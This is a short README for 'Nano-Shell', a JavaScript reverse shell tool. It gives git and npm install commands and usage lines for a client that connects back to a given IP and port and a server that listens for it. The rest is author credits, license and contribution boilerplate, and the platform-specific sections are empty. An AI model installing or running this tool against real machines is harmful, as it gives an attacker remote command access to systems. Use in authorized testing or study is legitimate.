Simple JS reverse shell
🏠 Homepage
git clone https://github.com/ghostfighter50/Nano-Shell #downloads the repository
cd Nano-Shell #navigates into repository folder
npm i -g #installs the required packages
nano-shell --help #checks if it's installed
Client :
nano-shell -u <ip> -p <port>
Server :
nano-shell -h <port>
On Unix systems :
On Windows system :
npm run test
👤 Ghostfighter50
- Github: @ghostfighter50
Contributions, issues and feature requests are welcome!
Feel free to check issues page. You can also take a look at the contributing guide.
Give a ⭐️ if this project helped you!
Copyright © 2020 Ghostfighter50.
This project is ISC licensed.
This README was generated with ❤️ by readme-md-generator